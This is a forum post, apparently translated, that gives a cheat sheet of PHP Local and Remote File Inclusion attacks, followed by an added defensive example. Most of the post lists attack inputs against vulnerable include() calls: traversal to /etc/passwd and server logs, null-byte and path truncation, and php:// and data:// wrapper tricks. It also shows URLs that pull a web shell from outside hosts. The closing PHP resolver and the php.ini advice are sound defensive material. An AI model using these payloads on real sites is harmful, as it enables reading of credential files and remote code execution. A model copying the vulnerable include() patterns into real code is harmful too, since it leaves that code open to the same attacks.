I saw some people asking about File Inclusion, so I am starting this topic to answer all the questions.

Local File Inclusion, basic level:
For example, take code like the following.
Code:
<?php include("includes/" . $_GET['file']); ?>
We will be able to do the following.
Including files in the same directory:
?file=.htaccess
View path:
?file=../../../../../../../../../var/lib/locate.db
(this file is very interesting because it lets you search the filesystem, other files)
Including injected PHP code (this can go through error.log, ssh auth.log, a session file, ...):
?file=../../../../../../../../../var/log/apache/error.log

Local File Inclusion, advanced:
For example, take code like this.
Code:
<?php include("includes/" . $_GET['file'] . ".htm"); ?>
We will use the following.
Null Byte Injection (requires magic_quotes_gpc=off):
?file=../../../../../../../../../etc/passwd
Listing directories with Null Byte Injection (UFS filesystem, magic_quotes_gpc=off):
?file=../../../../../../../../../var/www/accounts/
Path Truncation:
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
See more on path truncation at
http://www.ush.it/2009/02/08/php-fil...ttack-vectors/
Dot Truncation (Windows):
?file=../../../../../../../../../etc/passwd……………. …
Reverse Path Truncation:
?file=../../../../ [...] ../../../../../etc/passwd

Now we move on to Remote File Inclusion, basic:
Example
Code:
<?php include($_GET['file']); ?>
We can do the following.
Including Remote Code (requires allow_url_fopen=On, allow_url_include=On):
?file=http://sodvn.org/tools/shell.txt (https or ftp)
Using the PHP stream php://input (only for POST parameters, allow_url_include=On):
?file=php://input
Using the PHP stream php://filter (this one works even without magic_quote turned on):
?file=php://filter/convert.base64-encode/resource=hehe.php
Using data URIs (requires allow_url_include=On):
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
Using XSS (this one is neat, although it is limited by firewalls):
?file=http://127.0.0.1/path/xss.php?xss=phpcode

Remote File Inclusion, another variety:
Example:
Code:
<?php include($_GET['file'] . ".htm"); ?>
then
?file=http://test.com/shell
?file=http://test.com/shell.txt?
?file=http://test.com/shell.txt%23 (allow_url_fopen=On, allow_url_include=On)

Some further references:
The POST DATA method
http://blog.php-security.org/archive...l_include.html
PHP Protocol Wrappers documentation
http://www.php.net/manual/en/wrappers.php.php
PHP Filter documentation
http://www.php.net/manual/en/filters.convert.php
added code exec via ssh auth.log http://www.coresec.org/2011/05/12/lo...Assistance.pdf
The next post will cover how to defend against this.
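
As a defensive counterpart to the include() snippets above, this added example (not part of the original post) resolves the requested page through a strict name pattern plus a realpath() containment check before anything is included. resolve_page() and the temporary includes directory are hypothetical names, and the sample inputs are constructed from the request strings listed in this post.

```php
<?php
// Added example: hardened replacement for
//   include("includes/" . $_GET['file'] . ".htm");
// resolve_page() is a hypothetical helper, not code from the original post.

function resolve_page(string $baseDir, string $name): ?string
{
    // 1. Accept only a short identifier. Dots, slashes, backslashes, NUL
    //    bytes and ':' are all outside the pattern, so traversal, truncation
    //    padding, php://, data:// and http:// values never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise and confirm the target is still inside $baseDir
    //    (covers a symlink planted inside the includes directory).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.htm');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed self-check: throwaway includes directory with one valid page.
$dir = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.htm', '<p>home</p>');

$samples = [                       // constructed from the requests in this post
    'home',
    '.htaccess',
    '../../../../etc/passwd',
    "../../../../etc/passwd\0",
    'php://filter/convert.base64-encode/resource=hehe.php',
    'http://test.com/shell.txt?',
];
foreach ($samples as $s) {
    $p = resolve_page($dir, $s);
    printf("%-60s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
        $p === null ? 'rejected' : 'include ' . basename($p));
}
unlink($dir . '/home.htm');
rmdir($dir);
```

In the application, call include only on a non-null return value. Keeping allow_url_include=Off in php.ini (the PHP default) separately closes the remote URL, php://input and data:// cases listed above.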